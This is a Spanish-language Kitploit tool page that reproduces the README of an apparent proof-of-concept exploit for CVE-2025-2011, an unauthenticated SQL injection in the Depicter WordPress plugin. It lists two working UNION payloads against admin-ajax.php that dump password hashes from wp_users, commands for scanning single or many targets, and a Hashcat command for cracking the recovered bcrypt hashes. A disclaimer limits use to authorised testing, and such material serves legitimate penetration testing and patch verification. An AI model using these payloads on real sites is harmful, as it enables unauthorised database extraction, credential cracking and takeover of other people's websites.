Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/x3rx3ssec/cve-2025-2011
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit para CVE-2025-2011

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2025-2011

Por: X3RX3S Pero orgullosamente saqueado por Ash Wesker que usó GPT con mi código y su banner ;) ver aquí ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Incluso puedes ver mi handle en 'su' código -_-'

Propósito: Una herramienta de prueba de concepto para evaluar una vulnerabilidad de inyección SQL (CVE-2025-2011) en sitios WordPress.
Descargo de responsabilidad: Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito. Las pruebas no autorizadas son ilegales y poco éticas. Captura de pantalla del 2025-11-02 19-44-16


Acerca de la vulnerabilidad :)

  • El plugin Slider & Popup Builder de Depicter para WordPress es vulnerable a una inyección SQL genérica a través del parámetro 's' en todas las versiones hasta la 3.6.1 inclusive, debido a un escape insuficiente del parámetro proporcionado por el usuario y a la falta de preparación adecuada en la consulta SQL existente. Esto permite que atacantes no autenticados añadan consultas SQL adicionales a las consultas ya existentes, que pueden ser utilizadas para extraer información sensible de la base de datos.

Características

  • Dos payloads de SQLi (seleccionables con -p 1 o -p 2)
  • Detección de hashes Bcrypt ($2a$, $2b$, $2y$), incluyendo variantes con prefijo $wp$
  • Resultados guardados por nombre de host: results_<hostname>.txt
  • Integración opcional con Hashcat para bcrypt (-m 3200) con un aviso
  • Soporta una URL única (-u) o múltiples objetivos mediante un archivo (-f)

Requisitos

  • Python 3.8+
  • Paquetes pip:
    • requests
    • colorama

Instalar dependencias:

root@kitploit:~
pip install requests colorama

Opcional (para crackear):

  • hashcat instalado y disponible en tu PATH (Por defecto es /usr/share/wordlists/rockyou.txt)
  • Una lista de palabras como /usr/share/wordlists/rockyou.txt

Uso

Hacer el script ejecutable (opcional):

root@kitploit:~
chmod +x CVE-2025-2011.py

Objetivo único (payload 1 por defecto):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Objetivo único (payload 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Múltiples objetivos desde archivo (una URL por línea):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Salida

Para cada host probado, el script guarda un archivo de resultados:

root@kitploit:~
results_<hostname>.txt

Si se encuentran hashes bcrypt, se guardan en hashes.txt y se te preguntará si deseas crackearlos con Hashcat. Ejemplo de comando Hashcat usado por el script:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Nota: bcrypt es lento por diseño. El crackeo puede llevar mucho tiempo y requerir GPUs.


Payloads

  • Payload 1 (por defecto):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Uso Legal y Responsable

Esta herramienta se proporciona únicamente con fines educativos y defensivos. No la utilices contra sistemas para los que no tengas permiso explícito. El autor y distribuidor no aceptan responsabilidad alguna por el mal uso. Siempre obtén autorización por escrito antes de realizar pruebas contra objetivos que no poseas.


Notas y Ajustes

  • Si tienes diferentes listas de palabras, actualiza la función run_hashcat en el script para que apunte a tu lista preferida.
  • Si Hashcat no está instalado o prefieres no crackear hashes, responde N cuando se te pregunte.
  • Puedes ajustar los tiempos de espera y el comportamiento de los hilos en el script para escaneos a gran escala.

Hecho a retazos por

  • X3RX3S
  • Inspirado por flujos de trabajo de investigación de seguridad responsable y Chocapikk (https://github.com/Chocapikk.)
Descargar herramienta